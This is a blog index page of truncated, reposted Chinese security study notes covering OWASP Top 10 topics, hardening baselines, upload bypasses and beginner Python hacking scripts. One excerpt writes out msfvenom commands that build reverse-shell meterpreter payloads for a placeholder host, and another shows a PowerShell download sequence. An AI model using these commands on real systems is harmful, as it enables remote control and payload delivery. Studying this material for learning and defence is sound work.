aojiang1365-CSDN博客

转载 docker学习笔记

Mac系统安装docker：https://www.runoob.com/docker/macos-docker-install.html国内镜像源：https://registry.docker-cn.comhttp://hub-mirror.c.163.comhttps://docker.mirrors.ustc.edu.cn...

2019-08-23 11:29:00 184

转载判断服务器类型的小技巧

方法一、通过PING命令查看TTL判断操作系统类型就是使用PING命令来查看TTL值从而判断操作系统类型。 TTL=128，这是WINNT/2K/XP。 TTL=32，这是WIN95/98/ME。 TTL=256，这是UNIX。 TTL=64，这是LINUX。如下图所示：方法二、修改网页后缀，观察有无报错来判断操作...

2019-07-29 16:06:00 1191

转载 Python安全脚本 ---- Linux主机基线查询

总体思路：调用pexpect模块中的pxssh 与Linux主机实现交互，然后批量导入命令。能实现与Linux主机交互的方式：from pexpect import pxsshs = pxssh.pxssh() s.login(host,username,passwd) s.sendline(cmd)...

2019-04-18 17:17:00 698

转载 Poc初探之XXE

用bwapp的例子简单回顾下xxe漏洞：通过在xml外部实体附带非法参数，实现非法操作。如下图：POC编写思路：针对漏洞页面，发送带相应非法参数的包。人生苦短，下面用Python 的urllib2模块演示。 1 #! /usr/bin/python 2 # coding=utf-8 3 # __author__='Dou—wei'...

2019-04-18 15:21:00 514

转载 mysql操作

一、mysql启动和关闭windows 启动： 1.cd c:\mysql\bin 2.mysqld --console 关闭： 1.cd c:\mysql\bin 2.mysqladmin -uroot shutdown 还可以：启动： 1....

2019-04-02 16:03:00 216

转载 msfvenom常用脚本生成

1、 Windowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe2、Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> ...

2019-03-19 16:41:00 326

转载 CC攻击防护方法

代码层面防护：1、优化代码，多利用缓存减少重复查询内容，减少资源开销。2、不重要的站多用静态页面3、限制最大连接数网络、中间件层面防护：1、更改web端口2、域名解析欺骗（临时修改域名对应的IP地址）3、禁止网站代理访问4、应用防火墙（限制一定时间内的访问次数）转载于:https://www.cnblogs.com/ScriptK...

2019-03-18 16:55:00 137

转载上传漏洞分类

/*以下例子多来自《web安全深度剖析》，权当记录。*/一、web容器解析漏洞　　IIS解析漏洞（V6.0）：　　1、当建立*.asa 或*.asp的文件夹时，起目录下的任意文件IIS6.0都当做asp来解析，如下图：　　　　2、当文件以*.asp;1.jpg命名时，IIS6.0同样会当做asp来解析，如下图：　　　　　WebDav漏洞：...

2019-03-11 23:22:00 204

转载 cmd下载文件（利用powershell）

在cmd里依次输入：1 start powershell2 $client = new-object System.Net.WebClient3 $client.DownloadFile('X', 'Y')X：填文件下载地址Y：填写下载的保存路径及文件名演示：转载于:https://www.cnblogs.com/ScriptKid-...

2019-03-07 21:54:00 1013

转载发送HTTP请求的新姿势

Windows：telnet命令（telnet地址 ==》按‘ctrl + ]’进入编辑==》写包头==》双击enter发送）Linux：curl命令（-b cookie -e referer）具体参数参考：https://www.cnblogs.com/duhuo/p/5695256.html转载于:https://www.cnbl...

2019-03-05 21:24:00 102

转载 Ubuntu快速安装MSF的命令

快速安装：curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall &amp...

2019-01-24 22:40:00 1455

转载 Ubuntu无显卡驱动，修改分辨的办法

物理机装Ubuntu，锐龙5核显未找到显卡驱动，被默认800X600的分辨率恶心了半天。最后发现修改grub的方式可以修改分辨率！打开：/etc/default/grub搜索：#GRUB_GFXMODE=640x480编辑：640x480改成你想要的分辨率，并取消前面的#例如：GRUB_GFXMODE=1920x1080 更新：sudo update-grub最后：reboot参考于：h...

2019-01-24 21:32:00 451

转载 windwos 安全基线

1. 账号管理1.1. 共享账号管理配置名称账号分配检查，避免共享账号存在配置要求1、系统需按照实际用户分配账号；2、根据系统的使用需求，设定不同的账户和账户组，包括管理员用户，数据库用户，审计用户，来宾用户等；3、避免出现共享账号情况；操作指南参考配置操作（适用2...

2019-01-22 10:34:00 537

转载 Linux 安全基线

1. 账号管理1.1. 共享账户检查配置名称账号分配检查，避免共享账号存在配置要求1、系统需按照实际用户分配账号；2、避免不同用户间共享账号，避免用户账号和服务器间通信使用的账号共享。操作指南参考配置操作：cat /etc/passwd查看当前所有用户的情况；...

2019-01-22 10:20:00 490

转载 OWASP top 10 （2017）学习笔记--安全错误配置

A6:2017 安全错误配置漏洞描述：安全配置错误是最常见的安全问题，这通常是由于不安全的默认配置、不完整的临时配置、开源云存储、错误的HTTP 标头配置以及包含敏感信息的详细错误信息所造成的漏洞影响：攻击者能够通过未修复的漏洞、访问默认账户、不再使用的页面、未受保护的文件和目录等来取得对系统的未授权的访问或了解。检测场景：1、高危端口（22、3389、139等）...

2019-01-16 16:21:00 484

转载 OWASP top 10 （2017）学习笔记--跨站脚本（XSS）

A7:2017 跨站脚本（XSS）漏洞描述：当应用程序的新网页中包含不受信任的、未经恰当验证或转义的数据时，或者使用可以创建HTML或JavaScript 的浏览器API 更新现有的网页时，就会出现XSS 缺陷。漏洞影响：常见危害为窃取凭证为主。该漏洞的危害性由JavaScript代码决定，可参见相关XSS平台或BEEF工具。检测场景：基于不同标签的检测命令：...

2019-01-16 16:21:00 170

转载 OWASP top 10 （2017）学习笔记--失效的访问控制

A5:2017 失效的访问控制漏洞描述：未对通过身份验证的用户实施恰当的访问控制，攻击者可以利用这些缺陷访问未经授权的功能或数据。漏洞影响：技术影响是攻击者可以冒充用户、管理员或拥有特权的用户，或者创建、访问、更新或删除任何记录。业务影响取决于应用程序和数据的保护需求。检测场景：越权：　　横向越权、纵向越权文件操作：　　文件上传、文件包含、任意文件下载...

2019-01-09 15:04:00 759

转载 OWASP top 10 （2017）学习笔记--XML外部实体（XXE）

A4:2017-XML 外部实体(XXE)漏洞描述：如果攻击者可以上传XML文档或者在XML文档中添加恶意内容，通过易受攻击的代码、依赖项或集成，他们就能够攻击含有缺陷的XML处理器。漏洞影响：攻击者可以利用XML外部实体窃取使用URI文件处理器的内部文件和共享文件、监听内部扫描端口、执行远程代码和实施拒绝服务攻击。检测场景：以下提供几种简单的Payload模型。...

2019-01-09 14:51:00 356

转载 OWASP top 10 （2017）学习笔记--敏感信息泄露

A3:2017-敏感信息泄露漏洞描述：许多Web应用程序和API都无法正确保护敏感数据，例如：财务数据、医疗数据和PII数据。攻击者可以通过窃取或修改未加密的数据来实施信用卡诈骗、身份盗窃或其他犯罪行为。未加密的敏感数据容易受到破坏，因此，我们需要对敏感数据加密，这些数据包括：传输过程中的数据、存储的数据以及浏览器的交互数据。漏洞影响：这个领域的错误频繁影响那些本应该加密...

2019-01-09 10:50:00 587

转载 OWASP top 10 （2017）学习笔记--失效的身份验证

A2:2017 - 失效的身份验证漏洞描述：通过错误使用应用程序的身份认证和会话管理功能，攻击者能够破译密码、密钥或会话令牌，或者利用其它开发缺陷来暂时性或永久性冒充其他用户的身份。漏洞影响：攻击者只需要访问几个帐户，或者只需要一个管理员帐户就可以破坏我们的系统。根据应用程序领域的不同，可能会导致放任洗钱、社会安全欺诈以及用户身份盗窃、泄露法律高度保护的敏感信息。检测...

2019-01-09 10:48:00 308

转载 OWASP top 10 （2017）学习笔记-注入

A1:2017 - 注入漏洞描述：将不受信任的数据作为命令或查询的一部分发送到解析器时，会产生诸如SQL注入、NoSQL注入、OS注入和LDAP注入的注入缺陷。攻击者的恶意数据可以诱使解析器在没有适当授权的情况下执行非预期命令或访问数据。漏洞影响：注入能导致数据丢失、破坏或泄露给无授权方，缺乏可审计性或是拒绝服务。注入有时甚至能导致主机被完全接管。检测场景：SQL...

2019-01-09 10:45:00 213

转载 Python新手灰帽脚本练习--Zip文件爆破

大概思路：通过遍历字典的方式执行zipfile模块的extractall方法执行解压操作，实现爆破操作。1、先来个常规的解压操作提前准备了'2323.zip'文件，并设置解压密码为‘123’，使用extractall方法实现解压。1 import zipfile2 zfile = zipfile.ZipFile('2323.zip')3 zfile.e...

2018-11-14 00:21:00 121

转载上传文件漏洞（上传绕过）

0x00 漏洞概述任意文件上传漏洞主要是由于程序员在开发文件上传功能时，没有考虑对文件格式后缀的合法性进行校验或只考虑在应用前端（Web 浏览器端）通过 javascript 进行后缀校验，攻击者可上传一个包含恶意代码的动态脚本（如 jsp、asp、php、aspx 文件后缀）到服务器上，攻击者访问该脚本时服务器将对包含恶意代码的动态脚本解析，最终执行相应的恶意代码。该漏洞最终将可能...

2018-09-21 01:21:00 337

转载不安全的直接对象引用漏洞（浅析）

漏洞定义不安全的直接对象引用，也被称IDOR。IDOR允许攻击者绕过网站的身份验证机制，并通过修改指向对象链接中的参数值来直接访问目标对象资源，这类资源可以是属于其他用户的数据库条目以及服务器系统中的隐私文件等等。导致这种情况出现的原因是，系统在接受用户输入并利用输入信息获取对象之前没有对用户身份权限进行检测。漏洞利用场景以BTS PenTesting Lab中...

2018-09-09 00:47:00 619

转载 python socket介绍

转载于：https://blog.csdn.net/rebelqsp/article/details/221099251、Socket类型套接字格式：socket(family,type[,protocal])使用给定的地址族、套接字类型、协议编号（默认为0）来创建套接字。socket类型描述...

2018-08-30 11:08:00 75

转载 python新手灰帽脚本练习---简易端口扫描

总体思路：调用了socket模块并用connect()函数链接了相应的IP和端口号，用send()函数发送数据并用recv()函数检查响应. 1 # -*- coding:utf-8 -*- 2 3 __author__='Dou—wei' 4 5 import socket 6 import sys 7 8 9 def sc...

2018-08-30 10:45:00 99

转载 python新手灰帽脚本练习---文件路径遍历收集

总体思路：os.path.abspath('.') #获取当前路径os.listdir #获取指定的文件夹包含的文件或文件夹的名字的列表os.path.join #用获取的文件名拼接路径os.path.isdir #判断路径是否为目录，用于递归 1 ...

2018-08-30 00:22:00 76

转载 python socket编程中端口被占用的解决方法（转载）

Python Socket编程中端口被占用的解决方法转载于：https://blog.csdn.net/appleyuchi/article/details/78071640使用Python Socket编程的时候，可能会遇到python socket.error: [Errno 48] Address alrea...

2018-08-29 23:32:00 965

转载 linux 学习随记---设置日志时间戳

一、设置系统环境变量echo 'export HISTTIMEFORMAT="%F %T `whoami` "' >> /etc/profile && source /etc/profile二、时间参数解析1、在~/.bashrc或etc/profile文件中添加的his...

2018-08-22 17:01:00 319

转载服务器端口总结

端口：0服务：Reserved说明：通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描，使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。端口：1服务：tcpmux说明：这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，默...

2018-08-22 16:05:00 121